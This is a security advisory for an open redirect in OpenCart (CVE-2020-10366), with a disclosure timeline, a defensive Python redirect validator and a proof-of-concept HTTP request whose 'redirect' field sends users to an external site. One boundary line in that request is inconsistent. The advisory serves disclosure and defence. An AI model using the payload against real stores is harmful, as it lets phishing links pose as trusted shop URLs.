CVSS2 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE

CVSS3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: NONE

EPSS Percentile: 40.0%
**Title:** Open Redirect in OpenCart
**Advisory ID:** CORE-2020-0006
**Advisory URL:** https://www.coresecurity.com/advisories/open-redirect-opencart
**Date published:** 2020-05-04
**Date of last update:** 2020-05-04
**Vendors contacted:** OpenCart
**Release mode:** Forced release
**Class:** URL Redirection to Untrusted Site (Open Redirect) [CWE-601]
**Impact:** Phishing attacks
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2020-10366
OpenCart [1] is an open source PHP-based online store management system. It can be used to create an online shopping framework, providing the ability to create both a front-end store for customers, as well as a full e-commerce platform for owners with administrative, inventory, and reporting capabilities. There are hundreds of community-built add-ons for additional functionality.
An open redirect was discovered in the web application: it accepts a user-supplied redirection target and redirects the browser to an external site without validating that input.
Other versions might be affected, but they were not tested.
No patches or new versions have been released to fix the reported issue.
This vulnerability was discovered and researched by Matias Mevied from the Core Security Consulting Services Team.
The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.
[CVE-2020-10366] An attacker could use a specially crafted link to a page of OpenCart to redirect a user to an arbitrary web page of the attacker's choice. This allows the attacker to mask a phishing attack with a trusted-looking link, since the link appears to point at the domain where OpenCart is installed.
The following proof of concept shows how the redirection is performed:
```http
POST /index.php?route=common/currency/currency HTTP/1.1
Host: 172.16.93.133
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://localhost/index.php?route=product%2fproduct&manufacturer_id=8&product_id=45
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYV0s5w4r
Content-Length: 233
Cookie: OCSESSID=10b302c7525052481e13d6fa5c; language=en-gb; currency=USD

------WebKitFormBoundaryYV0s5w4r
Content-Disposition: form-data; name="code"

------WebKitFormBoundaryYV0s5wcon
Content-Disposition: form-data; name="redirect"

http://www.coresecurity.com
------WebKitFormBoundaryYV0s5w4r--
```

```http
HTTP/1.1 302 Found
Date: Thu, 06 Feb 2020 13:44:25 GMT
Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.4.1 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/7.4.1
Set-Cookie: OCSESSID=10b302c7525052481e13d6fa5c; path=/
Location: http://www.coresecurity.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
```
In the above example, the value of the `redirect` form field is copied unvalidated into the `Location` header, and the HTTP 302 response redirects the user to http://www.coresecurity.com.
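One way a defender can validate a user-supplied redirect value before placing it in a `Location` header, as an added example that is not OpenCart's code and not part of the advisory. The store host, the fallback route and the function names are assumptions; the check goes beyond the single external URL in the proof of concept and also rejects the usual bypass variants (protocol-relative `//host`, userinfo `store@other`, backslashes, non-http schemes).

```python
from urllib.parse import urlsplit

# Constructed example: the host the store is served from. In a real
# deployment take this from the application's configured base URL,
# never from the request's Host header, which the client controls.
STORE_HOST = "shop.example.com"
DEFAULT_TARGET = "index.php?route=common/home"   # hypothetical fallback route


def _normalise(target: str) -> str:
    # Browsers treat '\' like '/', so normalise before parsing; otherwise a
    # value such as '/\\other.example' parses here as a harmless local path.
    return target.strip().replace("\\", "/")


def is_safe_redirect(target: str, store_host: str = STORE_HOST) -> bool:
    """True only if `target` stays on store_host."""
    t = _normalise(target)
    if not t:
        return False
    try:
        parts = urlsplit(t)
    except ValueError:            # e.g. malformed IPv6 brackets
        return False
    if parts.scheme:
        # Absolute URL: only http(s), and the hostname (not the whole netloc,
        # which may carry userinfo or a port) must be our own. A value like
        # 'http:/other.example' has no netloc and is rejected here too.
        return (parts.scheme.lower() in ("http", "https")
                and parts.hostname == store_host.lower())
    # No scheme: a netloc can only come from a leading '//', i.e. external.
    return parts.netloc == ""


def safe_redirect_target(target: str, store_host: str = STORE_HOST) -> str:
    """Value for the Location header: the validated, normalised target or
    the store's own landing page when the supplied one is not acceptable."""
    t = _normalise(target)
    return t if is_safe_redirect(t, store_host) else DEFAULT_TARGET


if __name__ == "__main__":
    # The value from the proof of concept is replaced by the fallback;
    # a store-local route passes through unchanged.
    for t in ("http://www.coresecurity.com",
              "index.php?route=product/product&product_id=45"):
        print(f"{t!r} -> {safe_redirect_target(t)!r}")
```

The same check should be applied to every parameter the application feeds into a redirect, not only the `redirect` field shown in the proof of concept.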
2020-01-10 - Vulnerability discovered by CoreLabs.
2020-03-27 - Email sent to OpenCart to ask about the correct contact for reporting advisory.
2020-03-27 - Ticket #254509 opened at OpenCart.
2020-04-07 - Ticket closed on their side. They are not interested in pursuing this issue.
2020-04-07 - CVE requested from Mitre and provided. We pivot to forced release. CVE-2020-10366 will be used.
2020-04-30 - OpenCart is informed about the publication of the forced release.
2020-05-04 - Advisory published.
CoreLabs, the research center of Core Security, a Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2020 Core Security and © 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>